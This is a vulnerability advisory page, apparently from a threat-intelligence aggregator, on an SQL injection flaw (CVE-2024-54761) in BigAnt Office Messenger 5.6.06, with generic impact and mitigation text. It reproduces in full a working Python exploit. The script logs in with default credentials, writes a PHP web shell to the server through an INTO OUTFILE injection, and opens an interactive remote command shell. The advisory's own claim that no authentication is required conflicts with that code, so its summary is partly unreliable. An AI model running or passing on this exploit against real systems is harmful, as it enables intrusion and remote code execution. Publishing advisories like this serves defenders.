BigAnt Office Messenger 5.6.06 - SQL Injection
BigAnt Office Messenger 5.6.06 - SQL Injection
AI Analysis
Technical Summary
The identified security threat concerns an SQL Injection vulnerability in BigAnt Office Messenger version 5.6.06. SQL Injection is a critical web application vulnerability that allows attackers to inject malicious SQL statements into input fields or parameters, which are then executed by the backend database. This can lead to unauthorized data retrieval, modification, or deletion, and in some cases, full system compromise. The vulnerability in BigAnt Office Messenger likely stems from insufficient input sanitization or parameterized query usage in its web interface or API endpoints. The presence of publicly available exploit code written in Python facilitates exploitation by attackers with moderate technical skills. Although no official patches or fixes have been released, the availability of exploit code increases the urgency for mitigation. The vulnerability does not require prior authentication or user interaction, which broadens the attack surface. Given the messaging platform’s role in internal communications, exploitation could expose sensitive organizational data, disrupt communications, or enable lateral movement within networks. The lack of known exploits in the wild suggests this is a newly disclosed vulnerability, but the risk remains significant due to the exploit’s accessibility and potential impact.
Potential Impact
For European organizations, the SQL Injection vulnerability in BigAnt Office Messenger 5.6.06 poses a significant risk to data confidentiality and integrity. Attackers could extract sensitive corporate communications, user credentials, or configuration data, potentially leading to espionage or data leaks. The integrity of messages and stored data could be compromised, undermining trust in the platform. Availability might also be affected if attackers execute destructive queries or cause database corruption. Organizations relying on BigAnt Office Messenger for critical internal communication could face operational disruptions. The risk is heightened for sectors with stringent data protection requirements, such as finance, healthcare, and government entities within Europe. Additionally, the exposure of internal communications could have regulatory implications under GDPR if personal data is compromised. The exploit’s ease of use and lack of required authentication increase the likelihood of attacks, especially from opportunistic threat actors targeting European enterprises.
Mitigation Recommendations
To mitigate this SQL Injection vulnerability, European organizations should immediately implement strict input validation and sanitization on all user-supplied data within BigAnt Office Messenger interfaces. Employing parameterized queries or prepared statements in the application code is critical to prevent injection attacks. Deploying a Web Application Firewall (WAF) configured to detect and block SQL Injection attempts can provide an additional layer of defense. Organizations should monitor database logs and application behavior for unusual query patterns or access anomalies indicative of exploitation attempts. Until an official patch is released, consider isolating the messaging server within a segmented network zone with limited access. Conduct regular security assessments and penetration tests focusing on web application vulnerabilities. Educate administrators and users about the risks and signs of compromise. Finally, maintain up-to-date backups of critical data to enable recovery in case of data loss or corruption.
Affected Countries
Germany, France, United Kingdom, Italy, Spain, Netherlands, Poland
Indicators of Compromise
- exploit-code: # Exploit Title: BigAnt Office Messenger 5.6.06 - SQL Injection # Date: 01.09.2025 # Exploit Author: Nicat Abbasov # Vendor Homepage: https://www.bigantsoft.com/ # Software Link: https://www.bigantsoft.com/download.html # Version: 5.6.06 # Tested on: 5.6.06 # CVE : CVE-2024-54761 # Github repo: https://github.com/nscan9/CVE-2024-54761 import requests from bs4 import BeautifulSoup import base64 class Exploit: def __init__(self, rhost, rport=8000, username='admin', password='123456'): self.rhost = rhost self.rport = rport self.username = username.lower() self.password = password self.target = f'http://{self.rhost}:{self.rport}' self.session = requests.Session() self.headers = { 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0', 'X-Requested-With': 'XMLHttpRequest', 'Origin': self.target, 'Referer': f'{self.target}/index.php/Home/login/index.html', 'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8', } self.clientid_map = { 'admin': '1', 'security': '2', 'auditor': '3', 'superadmin': '4', } self.clientid = self.clientid_map.get(self.username, '4') # Default to 4 if unknown def get_tokens(self): print("[*] Fetching login page tokens...") url = f'{self.target}/index.php/Home/login/index.html' r = self.session.get(url, headers={'User-Agent': self.headers['User-Agent']}) soup = BeautifulSoup(r.text, 'html.parser') tokens = {} meta = soup.find('meta', attrs={'name': '__hash__'}) if meta: tokens['__hash__'] = meta['content'] form = soup.find('form') if form: for hidden in form.find_all('input', type='hidden'): name = hidden.get('name') value = hidden.get('value', '') if name and name not in tokens: tokens[name] = value return tokens def login(self): tokens = self.get_tokens() if '__hash__' in tokens: tokens['__hash__'] = tokens['__hash__'] encoded_password = base64.b64encode(self.password.encode()).decode() data = { 'saas': 'default', 'account': self.username, 'password': encoded_password, 'to': 'admin', 'app': '', 'submit': '', } data.update(tokens) login_url = f'{self.target}/index.php/Home/Login/login_post' print(f"[*] Logging in as {self.username}...") resp = self.session.post(login_url, headers=self.headers, data=data) if resp.status_code != 200: print(f"[-] Login failed with HTTP {resp.status_code}") return False try: json_resp = resp.json() if json_resp.get('status') == 1: print("[+] Login successful!") return True else: print(f"[-] Login failed: {json_resp.get('info')}") return False except: print("[-] Failed to parse login response JSON") return False def check_redirect(self): url = f'{self.target}/index.php/admin/public/load/clientid/{self.clientid}.html' print(f"[*] Checking for redirect after login to clientid {self.clientid} ...") r = self.session.get(url, headers={'User-Agent': self.headers['User-Agent']}, allow_redirects=False) if r.status_code == 302: print(f"[+] Redirect found to {r.headers.get('Location')}") return True else: print(f"[-] Redirect not found, got HTTP {r.status_code}") return False def upload_shell(self): print("[*] Uploading webshell via SQLi...") payload = ';SELECT "<?php system($_GET[\'cmd\']); ?>" INTO OUTFILE \'C:/Program Files (x86)/BigAntSoft/IM Console/im_webserver/htdocs/shell.php\'-- -' url = f'{self.target}/index.php/Admin/user/index/clientid/{self.clientid}.html' params = {'dev_code': payload} r = self.session.get(url, params=params, headers={'User-Agent': self.headers['User-Agent']}) if r.status_code == 200: print("[+] Payload sent, checking the shell...") self.check_shell() else: print(f"[-] Failed to send payload, HTTP {r.status_code}") def check_shell(self): print("[*] Enter shell commands to execute on the target. Empty command to exit.") while True: cmd = input("shell> ").strip() if not cmd: print("[*] Exiting shell.") break shell_url = f'{self.target}/shell.php?cmd={cmd}' print(f"[*] Sending command: {cmd}") r = self.session.get(shell_url) if r.status_code == 200 and r.text.strip(): print(r.text.strip()) else: print("[-] No response or empty output from shell.") def run(self): if self.login(): if self.check_redirect(): self.upload_shell() else: print("[-] Redirect check failed, aborting.") else: print("[-] Login failed, aborting.") if __name__ == '__main__': import argparse parser = argparse.ArgumentParser(description='Exploit for CVE-2024-54761 BigAntSoft SQLi to RCE') parser.add_argument('-r', '--rhost', required=True, help='Target IP address') parser.add_argument('-p', '--rport', default=8000, type=int, help='Target port (default 8000)') parser.add_argument('-u', '--username', default='admin', help='Login username (default admin)') parser.add_argument('-P', '--password', default='123456', help='Login password in plain text') args = parser.parse_args() exploit = Exploit(args.rhost, args.rport, args.username, args.password) exploit.run()
BigAnt Office Messenger 5.6.06 - SQL Injection
Description
BigAnt Office Messenger 5.6.06 - SQL Injection
AI-Powered Analysis
Technical Analysis
The identified security threat concerns an SQL Injection vulnerability in BigAnt Office Messenger version 5.6.06. SQL Injection is a critical web application vulnerability that allows attackers to inject malicious SQL statements into input fields or parameters, which are then executed by the backend database. This can lead to unauthorized data retrieval, modification, or deletion, and in some cases, full system compromise. The vulnerability in BigAnt Office Messenger likely stems from insufficient input sanitization or parameterized query usage in its web interface or API endpoints. The presence of publicly available exploit code written in Python facilitates exploitation by attackers with moderate technical skills. Although no official patches or fixes have been released, the availability of exploit code increases the urgency for mitigation. The vulnerability does not require prior authentication or user interaction, which broadens the attack surface. Given the messaging platform’s role in internal communications, exploitation could expose sensitive organizational data, disrupt communications, or enable lateral movement within networks. The lack of known exploits in the wild suggests this is a newly disclosed vulnerability, but the risk remains significant due to the exploit’s accessibility and potential impact.
Potential Impact
For European organizations, the SQL Injection vulnerability in BigAnt Office Messenger 5.6.06 poses a significant risk to data confidentiality and integrity. Attackers could extract sensitive corporate communications, user credentials, or configuration data, potentially leading to espionage or data leaks. The integrity of messages and stored data could be compromised, undermining trust in the platform. Availability might also be affected if attackers execute destructive queries or cause database corruption. Organizations relying on BigAnt Office Messenger for critical internal communication could face operational disruptions. The risk is heightened for sectors with stringent data protection requirements, such as finance, healthcare, and government entities within Europe. Additionally, the exposure of internal communications could have regulatory implications under GDPR if personal data is compromised. The exploit’s ease of use and lack of required authentication increase the likelihood of attacks, especially from opportunistic threat actors targeting European enterprises.
Mitigation Recommendations
To mitigate this SQL Injection vulnerability, European organizations should immediately implement strict input validation and sanitization on all user-supplied data within BigAnt Office Messenger interfaces. Employing parameterized queries or prepared statements in the application code is critical to prevent injection attacks. Deploying a Web Application Firewall (WAF) configured to detect and block SQL Injection attempts can provide an additional layer of defense. Organizations should monitor database logs and application behavior for unusual query patterns or access anomalies indicative of exploitation attempts. Until an official patch is released, consider isolating the messaging server within a segmented network zone with limited access. Conduct regular security assessments and penetration tests focusing on web application vulnerabilities. Educate administrators and users about the risks and signs of compromise. Finally, maintain up-to-date backups of critical data to enable recovery in case of data loss or corruption.
Affected Countries
For access to advanced analysis and higher rate limits, contact root@offseq.com
Technical Details
- Edb Id
- 52412
- Has Exploit Code
- true
- Code Language
- python
Indicators of Compromise
Exploit Source Code
Exploit code for BigAnt Office Messenger 5.6.06 - SQL Injection
# Exploit Title: BigAnt Office Messenger 5.6.06 - SQL Injection # Date: 01.09.2025 # Exploit Author: Nicat Abbasov # Vendor Homepage: https://www.bigantsoft.com/ # Software Link: https://www.bigantsoft.com/download.html # Version: 5.6.06 # Tested on: 5.6.06 # CVE : CVE-2024-54761 # Github repo: https://github.com/nscan9/CVE-2024-54761 import requests from bs4 import BeautifulSoup import base64 class Exploit: def __init__(self, rhost, rport=8000, username='admin', password='123456'):... (5537 more characters)
Threat ID: 68a3d92dad5a09ad00eed720
Added to database: 8/19/2025, 1:53:49 AM
Last enriched: 11/11/2025, 2:09:53 AM
Last updated: 11/18/2025, 1:46:28 PM
Views: 70
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Related Threats
Data Stolen in Eurofiber France Hack
MediumGoogle Issues Security Fix for Actively Exploited Chrome V8 Zero-Day Vulnerability
CriticalGoogle Issues Security Fix for Actively Exploited Chrome V8 Zero-Day Vulnerability
MediumChrome 142 Update Patches Exploited Zero-Day
MediumCritical Fortinet FortiWeb WAF Bug Exploited in the Wild
CriticalActions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
External Links
Need enhanced features?
Contact root@offseq.com for Pro access with improved analysis and higher rate limits.